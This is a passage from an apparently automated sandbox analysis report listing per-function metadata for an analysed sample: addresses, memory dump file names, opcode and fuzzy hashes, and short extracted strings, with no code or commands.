                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 2994545307-3233224373
                                                                                                                                                            • Opcode ID: 0d964e0d1910e5c4a2c662d94d98aa0a9274dce88d1c6dc71946e61bd4803ee7
                                                                                                                                                            • Instruction ID: 9ec55a7d8dd76ba9f17039443a9400cd9ec2584bcf85a96da7747a2e911da023
                                                                                                                                                            • Opcode Fuzzy Hash: 0d964e0d1910e5c4a2c662d94d98aa0a9274dce88d1c6dc71946e61bd4803ee7
                                                                                                                                                            • Instruction Fuzzy Hash: 03B1F070A083019BD714EF18D890BBBBBE2EF85340F5449ACE5C58B352E3B5E855CB92
                                                                                                                                                            Function 00B9A850 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 0-3772416878
                                                                                                                                                            • Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                                                            • Instruction ID: 947ba978d6d1a0af29b36bbec354115cdda26df6e4c9ab21b06477c05d034568
                                                                                                                                                            • Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                                                            • Instruction Fuzzy Hash: 03B138702083819FD724CF18C88061BFBE1AFA9704F448A6DF5D997342D671EA18CBA7
                                                                                                                                                            Function 00BCFC20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: d8db152152b98df15b4b7f557ef153e6a7b386ada1db25eb6acc99acc20e1155
                                                                                                                                                            • Instruction ID: 482445d68cf85695a8564f0395bd50e9e97d388d779ce8228223a09c90c4ab3f
                                                                                                                                                            • Opcode Fuzzy Hash: d8db152152b98df15b4b7f557ef153e6a7b386ada1db25eb6acc99acc20e1155
                                                                                                                                                            • Instruction Fuzzy Hash: D481CEB0608342EBD710DF54D884F2AB7E6FB99705F0488ACF5C58B252E730D814CBA2
                                                                                                                                                            Function 00BAD457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: ab429020faa7b660404ba43dc6b9c073c4fe8379cafffce86e8315ae65e7bd0a
                                                                                                                                                            • Instruction ID: a51f0257ccc8ef3c03ebd4aa53b7a9c8e90a5c6aaf24d6af680f6552281cec17
                                                                                                                                                            • Opcode Fuzzy Hash: ab429020faa7b660404ba43dc6b9c073c4fe8379cafffce86e8315ae65e7bd0a
                                                                                                                                                            • Instruction Fuzzy Hash: 1C61E3B1908204DBD710EF58DC82A2AB3F1FFA5354F4809ADF98A9B351E771D910C792
                                                                                                                                                            Function 00BD4A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: 85fd36d2a8c6297703e0bfd536c419558e435d6946f18a95fc3c8683b06baef7
                                                                                                                                                            • Instruction ID: 513f5a1461994bc464c50cc6999c23551f1214d17b7710ca040ea95a86c509a0
                                                                                                                                                            • Opcode Fuzzy Hash: 85fd36d2a8c6297703e0bfd536c419558e435d6946f18a95fc3c8683b06baef7
                                                                                                                                                            • Instruction Fuzzy Hash: 1461E0756083419BD724DF25C880B2AF7E6EBD4314F2889AEE5C58B391E771EC50CB52
                                                                                                                                                            Function 00DCF2C9 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ;Y-N
                                                                                                                                                            • API String ID: 0-3561849851
                                                                                                                                                            • Opcode ID: a402fb986f710115da462a81ed3fc65f9fbe64ae0688b1a37188942632a6ad25
                                                                                                                                                            • Instruction ID: 6ccf444d0baf91f6852cea4d182a7c3b722358c89b029bb1bb476ca5a5ac8b3f
                                                                                                                                                            • Opcode Fuzzy Hash: a402fb986f710115da462a81ed3fc65f9fbe64ae0688b1a37188942632a6ad25
                                                                                                                                                            • Instruction Fuzzy Hash: F45135F660C304AFE304AF29EC4567AF7E6EBD4720F11C63EE6C483B44EA355805865A
                                                                                                                                                            Function 00B9E1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00B9E333
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                                                                            • API String ID: 0-2471034898
                                                                                                                                                            • Opcode ID: 0738bb5b0cab84619f1295ee0341b7dc21610caa18943ab2644a95f66d11859a
                                                                                                                                                            • Instruction ID: 4046a3afbabf384678a7b60adcf9b97bf6e7dd5c0c0a6fcb7ad51b8c87c3d7d9
                                                                                                                                                            • Opcode Fuzzy Hash: 0738bb5b0cab84619f1295ee0341b7dc21610caa18943ab2644a95f66d11859a
                                                                                                                                                            • Instruction Fuzzy Hash: 59512723A5D6914BD725CA3C9CA1269BAC70BA3334B3D87BAE9F58B3E1E515C8048350
                                                                                                                                                            Function 00BD3920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: d217097e3b45520179e6fce7fa64b984fdfbed934705f7e510704a8524911711
                                                                                                                                                            • Instruction ID: 1f906864ca63c21727439e41546a90e579ca2a9ba57ae95c8f578977019b5307
                                                                                                                                                            • Opcode Fuzzy Hash: d217097e3b45520179e6fce7fa64b984fdfbed934705f7e510704a8524911711
                                                                                                                                                            • Instruction Fuzzy Hash: 5651BF746092409BCB24DF14D990A2EF7E5EF85B04F18889EE4C687352E776DD10CB63
                                                                                                                                                            Function 00BA1BEE Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: L3
                                                                                                                                                            • API String ID: 0-2730849248
                                                                                                                                                            • Opcode ID: a00bedaf484006816bbcf8814347bad13ed9fc09bc1c9e6cfc7be5f5898fed26
                                                                                                                                                            • Instruction ID: 31adaf0ad5969bd16c97b1a886ddde469d36b86fc042a58d92825dedd3432f85
                                                                                                                                                            • Opcode Fuzzy Hash: a00bedaf484006816bbcf8814347bad13ed9fc09bc1c9e6cfc7be5f5898fed26
                                                                                                                                                            • Instruction Fuzzy Hash: C54132B800C3809BC7549F18D894A2BBBF4FF86724F049D5CF5C59B291E736C9158B56
                                                                                                                                                            Function 00BCFF70 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: 7235ac1cd12f2eb5b937e0978710d8fd062782d737df79d7ad17d165be70bbfd
                                                                                                                                                            • Instruction ID: 4e915f925c256a2779b868cbee43aa45def047f5f8418188b2bd69447644b16b
                                                                                                                                                            • Opcode Fuzzy Hash: 7235ac1cd12f2eb5b937e0978710d8fd062782d737df79d7ad17d165be70bbfd
                                                                                                                                                            • Instruction Fuzzy Hash: EE31E5B5518309BBDA10FA14EC81B2BF7E9EB85744F5448AAF88487352F231DC14C763
                                                                                                                                                            Function 00BBE40C Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 72?1
                                                                                                                                                            • API String ID: 0-1649870076
                                                                                                                                                            • Opcode ID: e2c0a800561eea67e9446586ee938be09ac78d0fb2a221f31364146182192063
                                                                                                                                                            • Instruction ID: f622deda56d675a1bb886e22484022b86e7d10ed46bc62766566d9798fbc1210
                                                                                                                                                            • Opcode Fuzzy Hash: e2c0a800561eea67e9446586ee938be09ac78d0fb2a221f31364146182192063
                                                                                                                                                            • Instruction Fuzzy Hash: 1A31A275900244CFCB20CF99E8C05AEBBF5EB06304F6408A8E45AAB212C771ED05CBA1
                                                                                                                                                            Function 00BA6F91 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: df8988aa0a58064605accf595b9efd059874698d0bd27b187d40d18a3af0cdc9
                                                                                                                                                            • Instruction ID: 3a35b7f2f63ae6f0f286301ca548df1b34ce5703ed23ecb42c1ee051b7671a8e
                                                                                                                                                            • Opcode Fuzzy Hash: df8988aa0a58064605accf595b9efd059874698d0bd27b187d40d18a3af0cdc9
                                                                                                                                                            • Instruction Fuzzy Hash: 05415675209B04DBD7348F61CD90F26B7F2FB4A705F14889CE5C69BAA1EB32E8108B10
                                                                                                                                                            Function 00BBE66A Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 72?1
                                                                                                                                                            • API String ID: 0-1649870076
                                                                                                                                                            • Opcode ID: 34cc97a56f5243867d3a4b39213a72c93bbe8323935560fa41a71aa4c793939a
                                                                                                                                                            • Instruction ID: 900a5b4fdcc9001940b965511abca3b5b030c5414ea882e4b4ae189e663ddfb4
                                                                                                                                                            • Opcode Fuzzy Hash: 34cc97a56f5243867d3a4b39213a72c93bbe8323935560fa41a71aa4c793939a
